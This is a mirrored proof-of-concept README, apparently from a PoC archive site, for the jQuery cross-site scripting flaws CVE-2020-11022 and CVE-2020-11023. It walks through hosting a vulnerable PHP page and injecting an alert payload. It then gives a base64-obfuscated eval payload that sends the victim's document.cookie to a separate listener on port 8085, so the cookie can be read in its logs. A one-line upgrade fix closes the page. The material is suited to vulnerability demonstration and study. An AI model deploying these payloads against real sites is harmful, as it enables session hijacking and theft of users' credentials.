Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2020-11022 PoC — jQuery 跨站脚本漏洞

Source
https://github.com/0xAJ2K/CVE-2020-11022-CVE-2020-11023
Associated Vulnerability
Title:jQuery 跨站脚本漏洞 (CVE-2020-11022)
Description:jQuery是美国John Resig个人开发者的一套开源、跨浏览器的JavaScript库。该库简化了HTML与JavaScript之间的操作,并具有模块化、插件扩展等特点。 jQuery 1.2版本至3.5.0之前版本中存在跨站脚本漏洞。该漏洞源于WEB应用缺少对客户端数据的正确验证。攻击者可利用该漏洞执行客户端代码。
Description
Little thing put together quickly to demonstrate this CVE
Readme
# CVE-2020-11022 CVE-2020-11023

> In jQuery versions greater than or equal to 1.2 and before 3.5.0, passing HTML from untrusted sources - even after sanitizing it - to one of jQuery's DOM manipulation methods (i.e. .html(), .append(), and others) may execute untrusted code. This problem is patched in jQuery 3.5.0.

> In jQuery versions greater than or equal to 1.0.3 and before 3.5.0, passing HTML containing <option> elements from untrusted sources - even after sanitizing it - to one of jQuery's DOM manipulation methods (i.e. .html(), .append(), and others) may execute untrusted code. This problem is patched in jQuery 3.5.0.

#### Exploit 

1. Host the index.php page on a PHP webserver. I suggest using `sudo php -S 127.0.0.1:80` to spin up a quick server. 

#### Simple XSS 

2. Visit the path [http://127.0.0.1/?value=/%3E%3Cimg%20src=x%20onerror=alert(1)%3E](http://127.0.0.1/?value=/%3E%3Cimg%20src=x%20onerror=alert(1)%3E)
3. Press the "Append via .html()" button. 
4. See the alert pop.

![image](https://github.com/0xAJ2K/CVE-2020-11022-CVE-2020-11023/raw/main/xss.png)

#### Cookie stealing 

2. Start another webserver on port 8085, I suggest using Python for this `sudo python3 -m http.server 8085`
3. Visit the path [http://127.0.0.1/?value=/%3E%3Cimg%20src=x%20onerror=eval(atob(%27ZG9jdW1lbnQubG9jYXRpb249Imh0dHA6Ly8xMjcuMC4wLjE6ODA4NS8/Yz0iK2RvY3VtZW50LmNvb2tpZQ==%27))%3E](http://127.0.0.1/?value=/%3E%3Cimg%20src=x%20onerror=eval(atob(%27ZG9jdW1lbnQubG9jYXRpb249Imh0dHA6Ly8xMjcuMC4wLjE6ODA4NS8/Yz0iK2RvY3VtZW50LmNvb2tpZQ==%27))%3E)
4. Press the "Append via .html()" button. 
5. Check the Python logs and see your cookie in the log. 

![image](https://github.com/0xAJ2K/CVE-2020-11022-CVE-2020-11023/raw/main/cookie.png)

#### Fix

If you'd like to fix this CVE in this script then just change the jQuery version to <https://cdnjs.cloudflare.com/ajax/libs/jquery/3.5.0/jquery.js> :)
File Snapshot

 [4.0K]  /data/pocs/b10a401f429d63b7efab4263f2a811f18edb11eb
├── [ 26K]  cookie.png
├── [ 806]  index.php
├── [1.9K]  README.md
└── [ 33K]  xss.png

0 directories, 4 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.